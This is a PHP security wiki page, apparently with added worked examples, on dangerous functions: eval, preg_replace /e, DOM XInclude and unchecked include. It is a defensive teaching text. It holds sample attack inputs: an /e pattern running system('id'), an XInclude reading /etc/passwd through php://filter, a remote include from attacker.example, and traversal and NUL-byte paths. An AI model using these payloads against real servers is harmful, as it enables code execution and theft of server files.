 

Eval Functions

These functions can allow an arbitrary string or file to be executed as PHP code, with the privileges of the PHP process (normally the web server's user).

Includes

Including arbitrary files into a PHP program allows code to be injected into that program. This is especially dangerous when the included file is writable by others in a shared or compromised environment, or when allow_url_fopen is enabled and the path can be made to point at a remote URL.

See “Includes Bad Practice” below.

General

  • eval - Executes an arbitrary string as PHP code.
  • preg_replace - Executes the replacement string as PHP code when the /e modifier is present in the search pattern; anything that lets a user influence the pattern or the replacement is therefore code execution. The modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback is the replacement.
  • php_check_syntax (PHP5) - php_check_syntax also includes the file being checked, i.e. executes it as well (see the manual comments). The function only existed from PHP 5.0.0 to 5.0.4 and was removed in 5.0.5; use php -l from the command line for syntax checks.
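The following is an added example and is not code from the original page. It assumes two scenarios: a "search and replace" feature whose regular expression comes from a user or an admin-edited configuration (where a pattern ending in the e modifier makes preg_replace() eval() the replacement on PHP 5), and a placeholder expander of the kind that used to be written with /e, shown with preg_replace_callback() instead. The function names has_eval_modifier(), safe_replace() and expand_template() and the sample rules are all hypothetical.

```php
<?php
// Added example, not from the original page. Assumed scenarios:
// (1) a "search and replace" feature whose pattern is user-supplied;
// (2) a {{name}} template expander written without the /e modifier.

// Return true if a PCRE pattern carries the e modifier. A pattern is
// delimiter + body + delimiter + modifiers; bracket delimiters pair up,
// and modifiers are alphanumeric while delimiters are not, so the last
// occurrence of the closing delimiter is the real closer.
function has_eval_modifier($pattern) {
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return false;
    }
    $open  = $pattern[0];
    $pairs = array('(' => ')', '[' => ']', '{' => '}', '<' => '>');
    $close = isset($pairs[$open]) ? $pairs[$open] : $open;
    $end   = strrpos($pattern, $close, 1);
    if ($end === false) {
        return false;        // no closing delimiter: preg_replace() fails anyway
    }
    $modifiers = substr($pattern, $end + 1);
    return strpos($modifiers, 'e') !== false;
}

// Apply a user-supplied rule, refusing anything that could execute code.
// On PHP 5 the rule  /.*/e  with replacement  phpinfo()  would otherwise
// run phpinfo() once per match.
function safe_replace($pattern, $replacement, $subject) {
    if (has_eval_modifier($pattern)) {
        throw new InvalidArgumentException('e modifier is not allowed');
    }
    $result = preg_replace($pattern, $replacement, $subject);
    if ($result === null) {
        throw new InvalidArgumentException('invalid pattern');
    }
    return $result;
}

// Placeholder expansion without /e: the callback receives the match as
// data, and nothing in the template is ever parsed as PHP.
function expand_template(array $vars, $template) {
    return preg_replace_callback('/\{\{(\w+)\}\}/', function ($m) use ($vars) {
        return isset($vars[$m[1]]) ? $vars[$m[1]] : '';
    }, $template);
}

// Constructed rules: one legitimate, two that would execute code on PHP 5.
$rules = array(
    array('/colour/i', 'color'),
    array('/.*/e',     'phpinfo()'),
    array('{colour}e', 'system("id")'),
);
foreach ($rules as $rule) {
    try {
        echo safe_replace($rule[0], $rule[1], 'Favourite colour?'), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected ', $rule[0], ': ', $e->getMessage(), "\n";
    }
}
// Prints "Favourite color?" once and "rejected ..." twice.

// The curly-brace text that was the classic /e payload is inert here.
echo expand_template(array('name' => 'world'), 'hello {{name}} {{ {${phpinfo()}} }}'), "\n";
```

has_eval_modifier() is a defence for code that must keep accepting patterns from configuration on a PHP 5 installation; where the pattern is under the application's control, simply never write /e and use preg_replace_callback() as expand_template() does.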

DOM XML (PHP5)

The DOM extension supports the use of streams in a number of ways. In particular, an XInclude whose href begins with php:// (or any other stream wrapper) is fetched when DOMDocument::xinclude() is called, and xsl:include / xsl:import elements are fetched when a stylesheet is passed to XSLTProcessor::importStylesheet(), so attacker-controlled XML or XSLT can read files on the server. Whether this can be turned off depends on the PHP version: libxml_disable_entity_loader() (added in PHP 5.2.11, deprecated in PHP 8.0) blocks the external loads libxml makes, XIncludes included, and XSLTProcessor::setSecurityPrefs() (PHP 5.4) restricts file and network access during a transform. On releases without these, the only option is to reject XInclude in untrusted documents and never import a stylesheet from an untrusted source. Watch out when working with XML / XSLT from untrusted sources. See XML in PHP5
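An added example, not from the original page: a constructed attacker document that uses XInclude with the php://filter wrapper, beside a loader that refuses such documents instead of ever calling xinclude() on them. The namespace constant and the functions malicious_sample() and load_untrusted_xml() are assumed names; the DOCTYPE refusal is an extra check for the related external-entity problem.

```php
<?php
// Added example, not from the original page. Requires ext/dom.

const XINCLUDE_NS = 'http://www.w3.org/2001/XInclude';

// Constructed sample. If this were passed to DOMDocument::xinclude(), the
// href would be fetched through the php://filter wrapper and the base64
// of /etc/passwd would land inside <note>; parse="text" keeps it as text
// so a non-XML file does not break the include.
function malicious_sample() {
    return '<?xml version="1.0"?>' . "\n"
        . '<order xmlns:xi="' . XINCLUDE_NS . '">' . "\n"
        . '  <item>widget</item>' . "\n"
        . '  <note><xi:include href="php://filter/read=convert.base64-encode/resource=/etc/passwd" parse="text"/></note>' . "\n"
        . '</order>';
}

// Parse untrusted XML and return the DOMDocument only if it carries
// neither XInclude elements nor a DOCTYPE. LIBXML_NONET stops http://
// fetches during parsing but does nothing about php://, hence the checks.
function load_untrusted_xml($xml) {
    $prev = libxml_use_internal_errors(true);
    $dom  = new DOMDocument();
    $ok   = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    if (!$ok) {
        throw new InvalidArgumentException('malformed XML');
    }
    if ($dom->doctype !== null) {
        throw new InvalidArgumentException('DOCTYPE not allowed in untrusted input');
    }
    // Any element in the XInclude namespace, whatever its prefix.
    if ($dom->getElementsByTagNameNS(XINCLUDE_NS, '*')->length > 0) {
        throw new InvalidArgumentException('XInclude not allowed in untrusted input');
    }
    return $dom;   // safe to work with; xinclude() is never called on it
}

$samples = array(
    'malicious' => malicious_sample(),
    'benign'    => '<order><item>widget</item></order>',
);
foreach ($samples as $label => $xml) {
    try {
        $dom = load_untrusted_xml($xml);
        echo $label, ': accepted, ', $dom->documentElement->childNodes->length, " child node(s)\n";
    } catch (InvalidArgumentException $e) {
        echo $label, ': rejected (', $e->getMessage(), ")\n";
    }
}
// malicious: rejected (XInclude not allowed in untrusted input)
// benign: accepted, 1 child node(s)
```

Refusing the element is deliberately stricter than stripping it: a document that arrives with XInclude from a source that should never send one is itself a signal worth logging. For XSLT the same rule is to treat the stylesheet as code and only import ones shipped with the application; setSecurityPrefs() then limits what a trusted stylesheet may read or write while transforming untrusted data.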

This function list is probably incomplete.

Exploits:

Includes Bad Practice

A common beginner's mistake with the include / require functions looks like this:

echo '<a href="'.$_SERVER['PHP_SELF'].'?page=home">Home</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=links">Links</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=contact">Contact</a>';

// Vulnerable: whatever arrives in ?page= is used unchecked as a path
include 'pages/'.$_GET['page'];

Bearing in mind parameter manipulation attacks, the GET variable 'page' can contain anything, including directory paths, which PHP will resolve, e.g.

$_GET['page'] == '../uploads/badscript'

so the included file becomes pages/../uploads/badscript, i.e. uploads/badscript, and whatever an attacker managed to get onto the server (an upload, a log line, a temporary file) is parsed and executed as PHP. With allow_url_fopen enabled (and, from PHP 5.2, allow_url_include), ?page=http://attacker.example/shell.txt pulls the code from a remote host instead. Appending a fixed '.php' suffix in the include does not fix this: the path still traverses, and PHP before 5.3.4 truncated the filename at an embedded NUL byte (%00 in the query string), discarding the suffix entirely.

A better solution for this example would be:

echo '<a href="'.$_SERVER['PHP_SELF'].'?page=home">Home</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=links">Links</a>';
echo '<a href="'.$_SERVER['PHP_SELF'].'?page=contact">Contact</a>';

$pages = array('home','links','contact');

// Only include a page named in the fixed list; the strict flag means
// in_array() accepts nothing but an exact match for one of these strings
// (so ?page[]=x and similar are rejected too)
if ( isset($_GET['page']) && in_array($_GET['page'], $pages, true) ) {
    include 'pages/'.$_GET['page'].'.php';

// Otherwise use default...
} else {
    include 'pages/home.php';
}

Separately, $_SERVER['PHP_SELF'] in the links above is also request-controlled (it carries any path info appended to the URL) and should go through htmlspecialchars() before being echoed; that is a cross-site scripting problem rather than an include problem, but the same rule of validating or escaping at the point of use applies.
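The fixed list above is the right answer when the set of pages is known. As an added example that is not part of the original page, the hypothetical include_page() below handles the general case where the pages are whatever files exist in a directory: the name is restricted to a single path component, resolved with realpath(), and the result must still lie inside the pages directory before it is included. The fixture it builds in the temporary directory (two pages, an "uploaded" script and a symlink) is constructed for the demonstration, and the inputs tried are the attacks described in the text above.

```php
<?php
// Added example, not from the original page. Hypothetical include_page().

function include_page($pagesDir, $page, $default = 'home') {
    $base = realpath($pagesDir);
    if ($base === false) {
        throw new RuntimeException("pages directory not found: $pagesDir");
    }
    // One path component only: no slashes, dots, NUL bytes or newlines,
    // which also rules out wrapper prefixes such as http:// and php://.
    // \z rather than $: $ would still match before a trailing newline.
    if (!is_string($page) || !preg_match('/^[A-Za-z0-9_-]+\z/', $page)) {
        $page = $default;
    }
    $file = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    // realpath() follows symlinks, so a link under pages/ that points
    // elsewhere resolves outside $base and is refused here as well.
    if ($file === false || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        $file = $base . DIRECTORY_SEPARATOR . $default . '.php';
    }
    include $file;
}

// Constructed fixture: two real pages, an "uploaded" script outside the
// pages directory, and a symlink from pages/ to it.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
mkdir($root . '/pages', 0700, true);
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/pages/home.php',        "<?php echo \"home page\\n\";");
file_put_contents($root . '/pages/links.php',       "<?php echo \"links page\\n\";");
file_put_contents($root . '/uploads/badscript.php', "<?php echo \"ATTACKER CODE RAN\\n\";");
@symlink($root . '/uploads/badscript.php', $root . '/pages/evil.php');

$inputs = array(
    'links',                       // legitimate
    '../uploads/badscript',        // traversal, as in the text above
    "links\0",                     // NUL byte (truncated the path before PHP 5.3.4)
    "links\n",                     // trailing newline, slips past a $ anchor
    'evil',                        // symlink out of the pages directory
    'php://filter/resource=links', // stream wrapper
    array('x'),                    // ?page[]=x
);
foreach ($inputs as $input) {
    $shown = is_array($input) ? 'array' : addcslashes($input, "\0..\37");
    echo str_pad($shown, 30), ' -> ';
    include_page($root . '/pages', $input);
}
// Only 'links' reaches links.php; every other input falls back to the
// home page and uploads/badscript.php is never executed.

foreach (glob($root . '/*/*') as $f) {
    unlink($f);
}
rmdir($root . '/pages');
rmdir($root . '/uploads');
rmdir($root);
```

Both checks matter: the character class alone would still let a symlink or a future loosening of the pattern escape the directory, and the realpath() containment check alone would still pass a NUL-terminated name to older PHP releases.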

Additional Information

 
security/functions/eval_functions.txt · Last modified: 2006/12/09 17:15
 